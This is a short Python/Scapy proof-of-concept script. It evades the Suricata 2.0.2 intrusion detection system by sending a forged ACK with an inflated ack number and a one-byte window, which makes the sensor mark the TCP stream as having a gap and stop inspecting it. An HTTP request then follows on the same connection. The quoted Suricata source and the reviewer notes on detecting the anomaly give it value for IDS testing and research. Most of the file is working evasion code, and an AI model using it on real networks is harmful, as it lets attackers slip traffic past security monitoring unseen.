#!/usr/bin/python
#16-07-2014
#@JmpCallPoo
from scapy.all import *
#Possible evasion:
#
#stream-tcp-reassemble.c@2911 (Suricata 2.0.2)
#
#/* Check if we have a gap at the start of the list. If last_ack is
# * bigger than the list start and the list start is bigger than
# * next_seq, we know we are missing data that has been ack'd. That
# * won't get retransmitted, so it's a data gap.
# */
#if (SEQ_GT(seg->seq, next_seq) && SEQ_LT(seg->seq, stream->last_ack)) {
#    ...
#    stream->flags |= STREAMTCP_STREAM_FLAG_GAP; //Never process this stream again...
#    ...
#}
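dst_ip = '1.2.3.4'   # host to talk to; the sensor under test sits on the path to it

# ---- Normal three-way handshake ------------------------------------------
syn = IP(dst=dst_ip) / TCP(dport=80, seq=123456, flags='S')
syn_ack = sr1(syn, retry=0, timeout=1)

# sr1() hands back None when nothing answers within the timeout, and every
# packet below indexes syn_ack[TCP]; fail here with a readable message rather
# than with a TypeError a few lines further down.
if syn_ack is None or TCP not in syn_ack:
    raise SystemExit('no SYN/ACK from %s:80 within the timeout, giving up' % dst_ip)

ack = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+1, flags='A', window=4096)
sr1(ack, retry=0, timeout=1)

# ---- The "evil" packet ---------------------------------------------------
# A pure ACK whose ack number (seq+3) is ahead of what the peer has actually
# sent (the SYN, correctly acknowledged with seq+1 above), with the window
# shrunk to 1.  The author's observation: the peer's TCP stack is not
# affected, while Suricata 2.0.2 treats it as an acknowledged data gap and
# sets STREAMTCP_STREAM_FLAG_GAP on the stream (see the
# stream-tcp-reassemble.c excerpt quoted at the top of the file, whose own
# comment reads "Never process this stream again").
# Reported by the author as working against Linux 3.2 and Windows XP hosts.
# NOTE(review): from the sensor side this segment is observable -- an ack
# number ahead of anything received from the server plus a 1-byte window --
# so a stream engine can log it as an anomaly instead of abandoning the
# stream; whether current Suricata releases still behave like 2.0.2 is not
# shown here and should be confirmed against the version in use.
fake_ack = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+3, flags='A', window=1)
sr1(fake_ack, retry=0, timeout=1)

# ---- The request the sensor should have inspected ------------------------
# Plain request on the same connection, back to the correct ack (seq+1).
getStr = 'GET /\r\nHost: ' + dst_ip + '\r\n\r\n'
# NOTE(review): window=4069 differs from the 4096 used everywhere else;
# presumably a typo, left as-is since nothing in the write-up depends on the
# window value of this segment.
request = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+1, flags='A', window=4069) / getStr
reply = sr1(request, retry=0, timeout=2)   # not used further; handy in an interactive session

# ---- Teardown (best effort) ----------------------------------------------
# The +29 / +329 offsets are hard-coded to the author's own request and
# response sizes and, as the original comment says, will not match another
# target; the FIN is not part of the behaviour demonstrated above, so a
# wrong offset here only means the peer does not close cleanly.
fin = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack+29, ack=syn_ack[TCP].seq+329, flags='FA', window=4096)
sr1(fin, retry=0, timeout=1)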